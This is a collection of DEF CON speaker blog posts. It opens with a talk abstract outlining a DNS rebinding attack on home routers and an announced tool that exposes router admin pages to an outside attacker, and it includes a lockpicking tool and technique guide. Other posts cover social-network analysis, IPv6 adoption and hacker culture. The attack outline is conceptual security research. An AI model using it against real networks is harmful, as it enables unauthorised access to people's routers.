The problem with this policy is that computers don't use domain names to communicate with each other; they use IP addresses. The idea behind DNS rebinding is:

1) Get the victim to load some JavaScript from www.evilhacker.com.
2) Convince the victim's browser that www.evilhacker.com has moved to a different IP address, say, 192.168.1.1.
3) Evil hacker's JavaScript is free to interact with www.evilhacker.com, which the browser now thinks is located at 192.168.1.1.

The difficult part in the above attack is convincing the victim's browser to switch IP addresses. Various methods of achieving this have been presented in the past, so why yet another talk on DNS rebinding attacks? Because quite simply, the common DNS rebinding attacks that have been discussed in the past are either not practical or simply no longer work:

o Setting low TTL values in DNS responses doesn't work anymore because of DNS pinning.
o Anti-DNS pinning attacks only work in older browsers (IE6/7, FF2.x), and even then the rebinding attack takes between 15 and 120 seconds to take effect depending on the victim's browser.
o The "multiple A record" technique can no longer be used to rebind to internal (RFC1918) IP addresses.
o In addition to browsers, third party plug-ins such as Flash and Java have implemented anti-rebinding measures.
Thanks to several features present in many popular routers and their underlying operating systems*, none of this will deter the attack discussed in this talk, which has been tested against live networks under real-world scenarios (with the appropriate permissions from the network owners, naturally). Common anti-DNS rebinding protections offered by services such as dnsmasq, OpenDNS and NoScript will not prevent this attack, nor will changing the router's internal IP address. The good news is that there are fixes that can be made by both vendors and end users to protect against this attack*. The bad news is that these are fixes that should have been implemented years ago, but instead have been ignored by both vendors and users alike.

Of course, what is a talk without a tool release? I will be demoing and releasing a tool that automates the entire attack and extends the target router's internal Web interface out to an external Web site where the attacker can access and browse the router's Web pages in real time, just as if he were sitting on the LAN himself. All the attacker needs is a user inside the target network to browse to the attacker's Web site. It's point-and-click hacking goodness that's fun for the whole family!

* To be discussed in more detail at the talk!

"Hey, maybe I've got a DEF CON talk emerging here"
Experiences of a first time DEF CON speaker (Part I)

"...I've seen this mentioned on another website, but one of the best ways to meet people is to do a talk..." … and so begins this short summary of my experience (up to now) as a first time DEF CON speaker, what I like about DEF CON, how I got involved, submitting a talk and just what is it I'll be talking about anyway….

Local DEF CON chapters, a serendipitous meeting
On the way home from DEF CON 15 I got chatting to another con goer, alien (@alien8 on twitter), a DEF CON Goon. alien told me to check out DC4420, the London, UK DEF CON chapter…so about 2 years later I went along.

DC4420- Community
Dc4420 is excellent. Each month a group of 50-80 hacker/geek types get together, typically for two talks, a tech talk and a fun/lower-tech talk. There's also plenty of opportunity to chat with folks…

…I've seen this mentioned on another website, but one of the best ways to meet people is to do a talk. Talking, or even just sharing what you're working on can lead to discussions with others who are tackling the same challenge or have complementary knowledge and skills.

I let alien know I had a talk about "teaching my dad to be safe online" and before I knew it, I was talking at DC4420. Well, this had a knock on effect of people talking to me about what I was doing in the local village community.

Through that one talk, I got chatting to some seriously smart people at DC4420 (Far smarter than I'll ever be). I've had discussion and help on a number of topics (non-work related, for the record) and also shared my learning's with others. Ultimately, this is what a community is about and I love being part of it.

That's all fine, but what the heck does this have to do with my DEF CON talk?

Seemingly Random Sequence of Events
Well, after DEF CON 17 I decided to start using Twitter (hey! It's actually pretty useful). Among the first people I followed were @_DEF CON_ , @ RyanlRussell and @tonyhawk (yes, the skateboard legend).

Tony was looking for volunteers to help in a worldwide twitter hunt. A what? A 'Twitter Hunt'. Tony is well known on twitter for randomly hiding skateboards, bmx's and other cool stuff, then sending out a clue (via twitter), so his tweeps can hunt down the schwag….

…so I volunteered, and to my amazement, I got selected to help (I'm nearly 40, married, with child, I shouldn't be this excited about a skateboard legend). His event involved close to 100 decks being hidden around the world with clues being sent out for locations as far apart as Sydney Australia, London UK and Boise Idaho.

And?
And I wanted to see a Google map with pictures of the people who hid the decks, the people who found them and the schwag. That's where my adventure started.

I sent out a tweet asking if anyone knew of a quick way to grab tweets between dates and pretty quickly I got a response from a fellow DC4420er going by the name of @l0sthighway (he's a smashing chap). He suggested I use Maltego (check out the community edition).

So, in about a month I went from no knowledge of Twitter or Maltego, to using Maltego, together with some dreadful PERL scripts to call the Twitter API. I had a bucket load of help from the wider community, including the Maltego creators, Roelof Temmingh and Andrew Mowhawk and of course a few folks from DC4420.

I wrote up some of my adventure and left it at that (new born child in the house and all that).

Charity
Just after the earthquake in Haiti, I spotted a tweet from DECappeal (the UK disaster umbrella charity). They wanted to gather stats on social media… well, I now knew a thing or two about this, so I sent them a tweet. A series of calls with DECappeal and British Red Cross later and I was collecting twitter stats for them and generating graphs.

Nigerian Scammer Networks
In late 2009/early 2010 a friend was on the wrong end of a Nigerian scam. Well, I just thought I'd have a poke around with Maltego and see if it could, theoretically, help identify anything interesting. Well, it got very interesting…

Hey, maybe I've got a DEF CON talk emerging here?
I chatted to alien about the potential content, who asked if l0sthighway and I would like to talk at the DC4420 meeting that coincides with Infosec Europe (the UK's big infosec show). Wow, that's like a big deal.

Although a watered down version of the intended DEF CON talk, it seemed to capture the interest of a number of people… so I figured I'd go ahead and submit a paper…what's the worst that could happen?

Call For Papers – Notes from the field
Well, I pinged Twitter looking for people who'd be interested in pointing me in the right direction with my CFP. Dave Rook (@securityninja) , Jayson Street (@jaysonstreet) , Rafal Los (@Rafallos) and alien (@alien8) all sent offers of help…They helped me transform my idea into a talk worthy of con-consideration.

My starting title, although reflective of the talk, was certainly not sufficiently "DEF CON", so I went through a few iterations, ending up with "Social Networking Special Ops: Extending data visualization tools for faster pwnage" (…closer).

My major observations are:

Creating a compelling title isn't as easy as it sounds.
1. Creating a CFP entry takes a good deal of time.
2. Get people to critically review your entry. I suggest people who've been accepted previously.
3. It helps if you've got a detailed outline of your talk and other supporting material (slideware, whitepapers etc).
4. If I ever submit again, I'll be getting my paper in sooner.
5. It's nail biting waiting to hear the outcome.

Well, to my amazement, I got accepted to speak. WOAH!...

So what's the talk about?
In a one sentence summary.

"my talk describes how data visualization tools (like Maltego) can be extended to speed up the analysis of social networks (well, anything really)".

The talk is delivered in 3 parts.

Part 1.
I start with an intro about social network analysis, how there's an explosion of personal data available online and why this presents both a problem and an opportunity. I figured most folks have some idea about this, so I don't spend a lot of time here, but I will call out research/work in this field.

Part 2.
I share how you can use visualization software, and in this case Maltego, to data mine social networks. I focus on Twitter, based on my experiences with the Tony Hawk Twitter Hunt. BTW. I'm also running the DEF CON Twitter Hunt so you can all share the fun of a twitter hunt. Thanks to the generosity of Tony Hawk, I've got a limited number of his decks (signed) to give away too.

The Tony Hawk angle is intended to be a fun and light hearted way to introduce Maltego, but what about something more interesting?

Part 3.
This section talks about my experience enumerating a Nigerian scam ring. I share what I've learned about Nigerian scammer operations; for instance,…

• Did you know there are hundreds of worldwide "cells" (62 in the UK alone) ?
• Have you any idea how much a Yahoozee (Nigerian scammer) makes?
• Have you seen what they post on social networks?

I'll share how I found this stuff out, using data visualization and techniques in social network analysis inspired by previous talks including "Satan is on my friends list" and "Social Zombies".

By the end of the talk I hope to leave the audience with an appreciation of work/research/tools in social network analysis and data visualization. I also hope to expose the audience to ideas that they can apply in different contexts. In short, I want to generate the same level of interest that sparks and motivates me when I go to a DEF CON talk.

What next
Well…

1. Come along to my talk at DEF CON on Sunday at 4pm (I'm also at Blackhat and Bsides).
2. Get on Twitter and get ready for the DEF CON Twitter Hunt.
I'm honored and excited to be able to talk and be actively involved with this year's con. If you want to say hi, send me a tweet or ping me on the forums.

…and yes. I'm bricking it a little bit… who wouldn't be ;-)


ARIN and IPv6 at DEF CON

"...The rebirth of the Internet is imminent, and it begins with the depletion of IPv4 and the rise of IPv6..." I've been lucky enough to witness some pretty remarkable events during my career in information technology. I witnessed the rise of the Internet first hand. Then I watched as the Internet and IPv4 made IPX, Banyan Vines, and other protocols obsolete. I was there for Y2K - a lot of money and effort went in to what amounted to a non-event for most enterprises. I watched as my portfolio crumbled when the dot com bubble burst. I worked at several companies that were victims of bad management and bad luck during that time. I've seen a lot of change in this industry, and yet, I think we're just getting started. The real boom is about to begin and with it comes great change.

We're on the cusp of the greatest change I am likely to witness in my career. The rebirth of the Internet is imminent, and it begins with the depletion of IPv4 and the rise of IPv6. IPv6 heralds a new age for the Internet. We'll finally realize the potential of the Internet as it was originally conceived; a huge network of inter-connected devices with real end to end connectivity. The ability to globally address every single connected device will change the way the Internet looks, the way it works, the way we work, the way we play, and the way we communicate.

Today's Internet has been a dry run for what will become the Internet for many generations far into the future. The new Internet will do things we cannot imagine today and will likely be unrecognizable to those of us that work on it today. The proliferation of IPv6 will bring about a mature information age and many new technologies and opportunities.

With great change often comes great turmoil. I expect the Internet to experience some growing pains during this transition. Rather than a soft landing, we appear poised to hit the wall at mach 3 and the result will forever alter the Internet.

The issue is simple: IPv4 addresses are running out, and fast – only 6.25% of the IPv4 free pool remains, and the rest is going quickly. Some companies have been slow to adopt IPv6 for various reasons, including the associated time, cost, and risks. But with IPv4 depletion imminent, more and more of the Internet will use IPv6, meaning we must run both IPv4 and IPv6 simultaneously. Dual-stacking means everyone can see our websites, use our web-based services, and communicate with us.

IPv6 is now a key feature that customers are looking for, and companies who offer it will have a significant advantage. Now is the time to request IPv6 addresses from ARIN or your appropriate Regional Internet Registry (RIR) (https://www.arin.net/resources/request.html) and start providing your customers with IPv6 connectivity in addition to IPv4.

On Sunday, August 1, John Curran, ARIN's President and CEO of ARIN, and I, ARIN's Network Operations Manager, will lead discussions on IPv6 at this year's DEF CON.

John's session {IPv6: No Longer Optional, Sunday, August 1, at 11:00am} will describe the key considerations for and benefits of IPv6 adoption and the steps all network operators and engineers should take to prepare for IPv4 depletion challenges. John will review regional and global IPv4 depletion and IPv6 adoption statistics, address allocation trends, and the IPv6 educational resources available to help you prepare.

In my talk, {Implementing IPv6 at ARIN, Sunday, August 1, at 1:00pm}, I will provide details of ARIN's own deployment of IPv6, and will include information about getting IPv6 transit, configuring hardware and software, and using off the shelf tools to ease the transition. I will also talk about security best practices related to IPv6 deployment.

If you cannot attend the session, but are looking to learn more about IPv6, you can visit www.arin.net or www.getIPv6.info for more information.

Packing It All In

"...leave plenty of room to take a chance and be enchanted by someone or a topic you have little exposure to..."This year, I am extremely fortunate to have been selected to speak twice.

The first talk I will give is on Android Rootkits. This talk is being given with one of my colleagues from London, Christian G. Papathanasiou (@h0h0_). We tried to make this a great talk for both new comers and veterans. If you are interested, come check it out. It is going to be a lot of fun!

The second talk is Malware Freakshow 2 — a continuation of the talk I gave at DEF CON 17. Again, this year, I am giving it with Jibran Ilyas (@jibranilyas). Last year, we spent a lot of time focused on the various environments that were compromised by malware and just a little bit of time on the actual malware demos. This year, we flipped it around. We found some really interesting advances were made over the last year, so a good portion of the talk is the live malware demos. (Yes, they are going to be done LIVE. If anyone out there has a direct line to the demo gods, please put a good word in for us!)

If this is your first time attending DEF CON, it can be very difficult to figure out what to do. I put together a few pointers. Hopefully, a few of these will help you make the most of your journey at the end of July.

The Talks
This year there are more talk choices than ever for attendees. The number of great talks is incredible. Some of the best talks I have seen where NOT the ones that had hype, whether by person or topic, associated with them. By all means, attend the popular talks, but leave plenty of room to take a chance and be enchanted by someone or a topic you have little exposure to. You might learn something that motivates you to do something great (or not). Keep in mind you are not going to be able to see even a fraction of the talks this year, so choose wisely.

The Contests
I have personally never competed in a contest at DEF CON, but I have many friends who do year after year. Some do well and some crash and burn, but I have heard many rewarding and interesting stories by those who have competed. The amount of time you are willing to commit is a big factor here. If you are thinking you are going to attend a ton of talks and also compete in 10 events, think again. If competing is your thing, go for it!!

The Parties
Catching up with old friends and making new contacts is one on the best parts of DEF CON. Many of the people I have met at DEF CON over the years, I still keep in touch with. A handful of those people I actually work with everyday.

There are many pubic and private parties at DEF CON. Use your contacts to find out where to be after hours. If you don't know anyone, like the boat I was in back in 2000, meet and talk to people at during the day and find out where they are going and what they are doing at night. For many events, you need to be invited or have some sort of token or ticket to get in. If you just tag along with a group of people who are going to a party with hopes that the guy at the door will take a liking, you will be disappointed. It is his job to keep you out. Whatever you do, don't name drop at the door. Hackers validate. There are also many public parties and events that are going on during the con that are likely much more hospitable than 194 sweaty guys and 6 girls stuffed into a skybox. Don't be a wallflower.

The Aftermath
Whether this is your first DEF CON or your eighteenth, allow yourself some time to decompress and then act upon what you learned or experienced. When it is all said and done and you are lying on the floor of McCarran Airport waiting for your flight to board, make a mental note to spend some time to think about things you learned and the people you met. Don't forget to keep in touch with all the great people you met, you never know where those contacts will lead you. Finally, if any of those talks sparked your interest, get involved and contribute to one to the most intelligent and creative communities on the planet.

---

What's This Lockpick For?

"Important note: Much of this is merely my opinion. My incredibly accurate opinion." Among the first questions you hear when teaching anyone to pick a lock is some variant of "What is this pick for?" I've heard it a dozen ways, "Which one should I use for this lock?", "Which one will open it fastest?" and "How does this one work?" I know that answering this question in print won't keep me from having to answer it a million more times, but at the very least it will help me collect my thoughts and hopefully serve as a primer to new pickers who come across it.

Important note: Much of this is merely my opinion. My incredibly accurate opinion.

Rakes, Hooks & Profile picks, oh my!

There are three major categories of lock picks. Rakes typically consist of multiple sharp or flowing curves and are meant to manipulate multiple pins at once. Hooks are just the opposite, consisting of a single point, though there is a great deal of variety in how that point is designed. Hooks are meant to manipulate a single pin at a time. Profile picks are all sharp angles and may seem completely random at first blush. These are designed to recreate the profile of the key with minimal manipulation.

There are outliers that don't fall into the three main groups. Of those, most important are the diamond & ball picks. I'll cover those in depth. Depending on how quickly I put together the rest of this material I may cover more esoteric tools meant for specific locking concepts. We'll see!

Hooks

The first tool many pickers will use is your basic medium hook. This is a perfect beginner tool because it's a bit clunky inside the lock, doesn't require a great deal of skill to get the best use out of it, but in its simplicity it remains very effective and often enjoys a place in the primary kit of any picker as their skill advances to the intermediate stage.

Medium HookTo best describe the medium hook's limitations, I'll explain the advantages of the Gonzo, so called because the head looks a bit like the nose of Gonzo the Great. Unlike the m.hook, the Gonzo has a rounded tip, allowing it to move more smoothly through the lock. Also, the tip extends just a bit higher than the m.hook, allowing it to better manipulate tricky high-low bittings. The Gonzo is beloved among many, if not most, advanced pickers and has taken the place of the m.hook in their primary kits.

Long HookThe Long Hook is a bear. It is difficult to move through many keyways, can get caught inside the lock mid-pick and is generally just uncomfortable to work with. However - the extreme tip that causes all of those problems also allows it to set the most ridiculous high-low bittings. Though this pick rarely sees regular use, it has proved itself invaluable once or twice and so many pickers will keep it around, just in case.

Deep CurveThe deep curve is the most widely borrowed member of a family of tools built around a specific method of picking. Personally, I've never cared for the Falle method of progressive curves, but there are people I respect a great deal who swear by it, so I'll leave it to them to fill you in. The deep curve, regardless of how I feel about the larger system, is an excellent tool. By allowing the belly of the curve to run along a low point in the keyway & rocking the pick into the lock, following the line of the pick head, you get a great sense of control and can easily manipulate difficult to reach pins in the back of the lock.

Notch HookThe most common notched hooks tend to fall, in height, somewhere between the m.hook & the l.hook. However, you can carve a notch into any pick you like and enjoy the benefits. Simply, the notch makes it easy to locate each pin inside the lock and in the rare situation where heavier-than-normal force is required you don't risk slipping off of the pin you are working on as you would with the Gonzo or m.hook. Finally, in locks with oddly shaped pins, such as Medeco's chisel tips, the notched hook allows you to manipulate them in more specific ways, such as rotating them.

Deforest diamondI do not know Deforest's first name, though I've heard someone say it before. These days the picks named for him are more likely to be known as an "offset diamond" and "offset ball," but where possible I'll try to give these picks what I consider their proper names. The Deforest diamond is typically my second pick in a lock, right after the Bogota, which I'll cover in the rakes section. The angled tip of these picks gives the deforest deeper reach than your typical hooks and the added shape to the tip, whether ball or diamond, allow you some additional manipulation options. My primary use of the Deforest is to defeat the previously mentioned high-low bittings. The Deforest moves through a lock with ease, unlike the l.hook and can set the more extreme high-lows that the Gonzo can't quite reach. Though you will rarely find them in starter sets, a Deforest should be one of the first picks you make or acquire after you get comfortable with your initial tools.

There are other hooks and other single pin picks that straddle the line between hook and something else, but by the time you come across them, you'll be able to deduce their function.

Rakes

I'm probably going to start some fights when I discuss rakes. I will be the first to admit that my tastes are sometimes non-standard, but I've tried countless tools and opened a lot of locks, so trust me. Then, when you find out I'm completely wrong and you don't open any locks, you'll have learned a valuable lesson about trusting experts on the internet.

C RakeI'll begin with the ever-popular "snake rake" or "c" rake. This diminutive, narrow profiled rake that is found, without fail, in every started set a new picker buys, is all but useless against decent locks. It will pop Master #3s like magic. It will stun and amaze and eventually, once you learn to use and love the other tools on this list, fall into disfavor and out of your primary kit.

Large S RakeMuch more interesting is the Large S. When I first saw this tool I was told it was the German secret weapon. "Push, Push, Open!" my Dutch friend declared. I bought one immediately and found great success with it. The Large S is able to set more varied bittings than the C or the S.

S RakeThe S rake is loved by a lot of people. I don't really tolerate it well and as such I'm probably not the person to describe it's best use. So I'm not going to! Ask almost any other competent picker though and I'm sure they can tell you why they like it. One note - this is a very common rake in starter sets and typically the first pick to break on a heavy handed newbie picker.

L RakeThe L rake, however, I love. The L is the only rake I buy in bulk for classes and workshops. The most common profile you will find for an L rake is pretty timid, but can still do the job. While this pick will open a decent number of locks, I've found it's best use is in setting 7-9 cut pins. Apply light tension & rake low in the keyway to set the longest pins in the lock, then, increase your tension a little bit as you go back in with a Gonzo or Deforest diamond to finish the lock off. A basic, but very effective speed picking strategy. These aren't easy picks to make by hand, but can be well worth it so you can craft a more aggressive profile.

BogotaMost important in this list is the Bogota. Sole creation of Raimundo, this pick has been poorly reproduced by many of the major manufactures in the last 3 years. Unfortunately for the people buying the knockoffs, you can't just stick a Bogota rake on a popsicle-stick handle and expect it to work it's magic. Lacking the thin, bent handle of the traditional Bogota, they have dramatically reduced the efficacy of the pick. I cannot overstate the ludicrous quality of a well made Bogota rake. NKT, a British competitor at the Dutch Open (now LockCon) in Sneak, NL made it to the final table using nothing more than a set of Bogota rakes and popped one of the final round locks in 3 seconds as well. They double as tension wrenches, it's why they come in pairs. The basic method is to hold the rake like a trigger and "Shake like you've had too much coffee." Silly as it sounds, it works. Personally, I've developed a slightly different technique over the years, but still, it would not work without the bent handle. The Bogota is the only rake on this list that allows me to get a quick topography of the lock with a few simple swipes. Bogota + Deforest Diamond is how I won my Black Badge.

W RakeThen there's the W rake. The l.hook of the rake world. This unwieldy, aggressive rake is sure to get bound up in the back of your lock and it's thin connection between shaft and pick head means it will bend and break with heavy handed use. However, just like the l.hook, it has proved itself by opening a tricky lock, if rarely, and thus remains in use today. Sometimes the ugly, odd and downright fragile picks will open the locks we can't get at otherwise, which brings us to...

Profile Picks

Unfortunately, I'm exhausted! So, I'll cover Profile Picks, Diamonds, balls & some of the more esoteric tools like Matadors and cruciform picks in a few days.

-Schuyler Towne

Kill Yr Idols

"You are not, in fact, a Hacker Superhero"I didn't talk to a soul for more than five minutes for the first three DEF CONs I went to.

I suppose I've been both a part of, and very much outside of, the "hacker scene" for a long time now. I grew up around punk rock: MaximumRockNRoll, all ages shows, a detached coolness and an unspoken set of rules and regulations that everyone knew somehow anyway, whether instinctively (for the kids who somehow Just Fit In, seemingly without trying), or learned (in my case) from subtle slights and ridicule, a silent but nonetheless rigid set of boundaries that defined what seven inches you bought (or admitted to buying), the width and specific colors and patterns of your braces, the strategic locations of which patches you had on your flight jacket and where.

Along with the punk scene, there was another I supposed I belonged to, or wanted to belong to as well, one I rarely admitted around my punk and skin friends, the world (back then) on boards and the right IRC channels, of quietly traded docs and warez and .NF0 files that mostly said very little but had that same beautiful and tragic optimism of my punk zines, the idea that all of us (somehow) could be more interesting than the sum of our parts, whether our salvation was some nebulous abstraction called Rock and Roll or another equally impenetrable abstraction called Hacking.

To me, going to my first DEF CON was a lot like going to my first punk rock show. I had a general idea of what to expect, had done a lot of my homework, knew the right words to say, had the right t-shirt, and mostly spent lots of time getting shunned, rated, shut down, and dismissed.

At punk shows, you could practice your game every week until you got it down. At DEF CON, and really just about nowhere else, you only get to try to figure out the social puzzle for a few days, and then try again next year. It's a long process, and one that turns a lot of people off. Yes, it keeps getting bigger, and yes, a lot of the same people come back every year, but I'd wager another equal number come once, can't figure out how things work, and never come again.

I'm really not bitter, I swear to you. If I was, I wouldn't have kept coming for ten years. I love DEF CON. I am a loyal DEF CON defender, I always show up early and leave late, and I even (OH NO HE DIDN'T! AWWW HELL NAW) like the Riv. I do. Sorry.

But seriously -- DEF CON people, all of you, need to stop taking yourselves so freaking seriously.

Point of order:

You are not, in fact, a Hacker Superhero. If you are reading this and are (in fact) a Hacker Superhero, my sincerest apologies. But for the vast majority of you reading this, you're not. You're just not.

And that's okay. You probably are really good at *something*, and are probably smarter than the average bear, otherwise you most likely wouldn't be bothering to come to DEF CON, more often than not on your own dime. Still, letting go of the idea that you're a REALLY BIG HIGHFALUTIN' GOSHDARNED DEAL will go a long way toward the two of us having a drink and a nice chat, and potentially one or both of us learning a thing or two. That "I Am A Serious And Unmitigated Total BadAss" vibe you're putting out? Not really that helpful, sorry. Let's drop it, and I'll front you a Tanqueray and tonic.

Another point of order:

Those people behind the podium, or running your favorite event, are not, actually, Hacker Superheroes either. No, seriously, they're not. Some of them are really, really, ridiculously smart. A larger number of them are really, really good at marketing. But NONE of them are superhuman. They're just people. Passionate people, sure. A particular flavor of people that are the exact reason we all get together at these shindigs year in and year out, sure.

But guess what? They're vain. They're neurotic. They have annoying nervous tics. They will talk to you about their cats and their favorite houseplants, they will have pieces of their lunch stuck between their teeth, and once you finish your tedious fawning about how great Bug X, Talk Y, or Book Z was, they will stare at your shoes, you will mumble something about the weather, and then some other fan(boy|girl) will come up and give them a bear hug and a high five and start fawning again, and neither of you will be any better off than when you started.

My point? I guess that we all need to forget the mythology. We need to forget the mythology we make around the supposed "stars" of our merry little band (ProTip: There's no such thing as a famous hacker -- Justin Bieber is famous, Johnny Long is a guy who was on CNN one time), and we need to forget the mythology we are all so desperately trying to make for ourselves. If you can get past all of that, past all the bullshit, simulacra, posturing, scenewhoring, smack-talking, and (nowadays) industry autofellatio, you will actually have a really good time at DEF CON, or at least I always do.

Here's how I go about doing that, what I finally figured out in my fourth year at con.

I talk to people. And I make other people talk to each other.

I'm not good at it, I'm really not. I forget names. I don't do small talk. I stutter sometimes and repeat myself. I interrupt a lot. I spit when I get excited. But for three days every year, at DEF CON, I do it anyway.

I grab random people who look like they're not interacting, and I make them interact, often against their will. If someone is a dick, I keep trying anyway. Alcohol seems to help.

I especially try to make people who look like they wouldn't do so under any reasonably sane set of circumstances get engaged in conversations. Feds and homeless people, blackhats and those Jesus Hacker guys, overdressed gothy glam-rockers and hyper-hetero Polish weightlifter types, those Korean CTF people with matching t-shirts and haircuts and well, whoever. I collect invites to SUPERELITEOMGPRIV8R00MPARTIES and give them to quiet kids who don't know anyone and would never get invited. I'm particularly proud of dragging Hovav Shacham's grad students to StripperCon two years ago. That was pretty epic.

In other words, I guess the way I keep sane and have fun at DEF CON is basically to spend every moment I can doing what no one (seriously, NO ONE) did for me those first three years: welcoming people to this thing we call "The Scene", and generally trying not to be a dick.

You should too. See you at con.

Trying to Be a Wise Man at DEF CON

"The smart man learns from his mistakes. The wise man learns from the mistakes of others.
- Anonymous"
I try very hard to share wisdom that I have learned from others but also I feel sometimes it is good to share my mistakes so others can be the wiser. With that in mind let me take you back to DEF CON 12 it was my first time at DEF CON thankfully even after my EPIC fail it was not my last. I went to my first DEF CON with all these notions on how it was supposed to be. The people were all hackers and uber leet you had to look weird to stand out (yes I spray painted my hair blue & yes to my chagrin there are pics online). All these people wanted to hang out with you and share what they knew and to hear what you had to say.

So in other words I went to DEF CON not really knowing what DEF CON was about. I did learn quite a lot my first time (most of it the hard way). I learned that DEF CON is what you make of it. If you want a place to just party with people who look and think like you then you will be happy. If you are looking for a place to learn hands on with some of the brightest people on the planet, good news, you will. If you go to DEF CON knowing what it will be and expecting it to conform to your ideals then you my friend will be sorely disappointed. DEF CON does not conform to ones ideals it is a place where we all learn to accept other points of references.

That was my Epic fail, I went thinking my way was how DEF CON was supposed to be not willing to open myself to all the other opportunities that the event had to offer. My first time there I met H D Moore, Tony Watson, Kevin Mitnick, Rain Forest Puppy, FX and the Woz. So what, I didn't stop to really learn from them I thrust my camera in their face to get a picture with some of my heroes. What I could have done was turn the dial down from 22 to maybe 6 then listen and converse with them. For you see, they would have talked with me stupid blue hair and all. Not because I was an author, or a DEF CON speaker for I was neither. No they would have spoken with me if I were willing to listen because they knew what DEF CON was really about, it is a place to share information and to learn from others.

I learned that lesson and I hope you learn it from me so you don't experience that first hand. Be yourself not what you think people are expecting. Feel free to go up to the speakers to ask them questions if they are not too busy or anxious getting ready for their talk they will most likely take time to talk to you. Do not waste that opportunity just for a picture. Talk to them as well as listen to what they have to say and start a friendship that will last longer than the picture taken.

Remember DEF CON at its core is a hacker conference sometimes though we forget the true meaning of that. Adam Laurie shared with me the DEF CON ethos. "If you know something, share it. If you learn something, learn more. When you really know your stuff, teach it." That is what a hacker conference should be all about.

This also brings to mind another question we tend to ask ourselves in the INFOSEC/Hacking community. Do you know what a hacker really is? The easy answers are not always the right answers. A hacker is more than the faceless nameless person behind that email you just opened (please don't click that link!).

A common quick (and lazy) definition has equal parts technology and malicious intent. But truth requires additional consideration. Hackers have been around far longer than John Draper (a.k.a. Captain Crunch – ask your favorite search engine for more on his exploits) or Matthew Broderick in War Games. Perhaps the better approach to a good definition is to look at some examples from history.

Many examples of a good definition can be found in the work of Sun Tzu. He brought a depth of thought to the strategy of war that had not been seen before his time. He realized success in war was not solely a function of physical power. Instead, victory in war was (and remains) dependent on variables both complex and subtle.

Sun Tzu would win battles with smaller forces. For example, he would use terrain and mental attacks to amplify the power of his army. He controlled his enemy's movements with false retreats. He drove them to choke points and applied force at the precise point of weakness (sounds a lot like a buffer overflow attack today).

Sun Tzu would send an assassin to the enemy's camp and kill the opposing general right before the battle (in technology that is called a zero-day attack). The ensuing chaos made victory nearly certain.

Sun Tzu would probably agree with a certain modern "warrior" – "knowing is half the battle". He would use any sources available to learn all he could about himself, his environment, and his enemy. Today a penetration tester might call that "building a profile" on a target. A politician might call that "opposition research".

Leonardo da Vinci is usually credited as a painter, sculptor, architect, polymath, and inventor. Hacker is an appropriate designation to add to the list. The techniques he used were so far ahead of his time that we still marvel at his insight. For example, his art was shaped by his study of optics, perspective, anatomy, and even psychology. He solved problems by adding knowledge from unexpected places. One fine example of a Leonardo hack is his journals. Most of them are written in mirror image cursive. This has often been credited as a type of "security by obscurity" since it would be difficult for a casual glance from an apprentice to reveal the master's secrets. However, a hacker would look at this result and see a great example of mental and physical dexterity. Someone who is left-handed knows the problem of writing left-to-right. The result is generally smudged script and ink-stained hands. So why not change the rules and write right-to-left? The key to the solution is to ignore the rules.

In 1608 Hans Lippershey of Holland asked for a patent for a device he had invented "for seeing far". The label of a hacker could be applied to the Italian Galileo Galilei who took the idea further and eventually built about one hundred different telescopes. He combined mathematics, optics, and good craftsmanship to build a better tool. However, the real "hacking" occurred when he pointed the device at Jupiter and saw a cluster of three "stars" that behaved strangely. When one of them disappeared, he deduced it had gone behind Jupiter. He went on to observe four satellites of Jupiter and even predicted their motions.

In 1932 a twenty-six year-old mathematician named Marian Rejewski joined two others in a secret attempt to deduce the internal workings of an early version of a German encryption machine called Enigma. He had a sudden insight that he tested on some encrypted text. He later described "From my pencil, as by magic, began to issue numbers designating the connections…" Rejewski brought a methodical, mathematical mind to his problem. Perhaps the best part of his "hack" was the confirmation of his solution. Rejewski tested his results with a copy of the Enigma manual that Hans Thilo Schmidt had managed to smuggle out of Germany. The whole story of how that happened is full of what is today called a "Social Engineering" attack. And even better – inside that manual was a sample message and the corresponding cipher text. To someone trying to break a cipher, this was gold. Today this is an example of taking advantage of unnecessary code left by a sloppy programmer.

Albert Einstein looked at the puzzle of gravity and realized for the previous 250 years we should have been thinking about the curvature of space and not a mysterious force. Thomas Edison tested 1,600 different materials, including a hair from a friend's beard, before he found the right filament for an electric light. Igor Sikorsky was only 19 when he designed and built his first attempt at a helicopter. Problems will yield to the right combination of will, creativity, and intelligence.

In 2009 the Iranian government held elections many of their citizens believed were fraudulent. Protesters spread evidence of government abuse 140 characters at a time on Twitter. Twitter icons from users all over the world turned green in support. "#iranelection" became one of many popular ways to spread news globally faster than the Iranian government could respond. Perhaps we will see a government yield to the power of a social network. That would be a hack worth watching.

The Urban Dictionary has a good definition of a hacker:
An individual capable of solving complex non-intuitive problems in a seemingly intuitive manner. The processes and techniques used are not necessarily methodical to the observer, but yet achieve results significantly and consistently faster than known experience would predict. A hacker is not defined in terms of intention or purpose, but rather by the talented single-mindedness of method. A hacker is not a hack. Today we label Steve Wozniak and Charlie Miller and HD Moore and Jeff Moss as modern "hackers". But the hack is only part of their stories. Their creativity and character, when applied to the puzzles they tackle produce what history will measure.

If you are a CEO with hackers among your employees, or a parent with a hacker for a daughter or son, be thankful for their vision. They see the world differently. They have the potential to advance human history. Nurture their character and give them room to explore. We can only imagine what they will try, discover, tear down, build up, and create.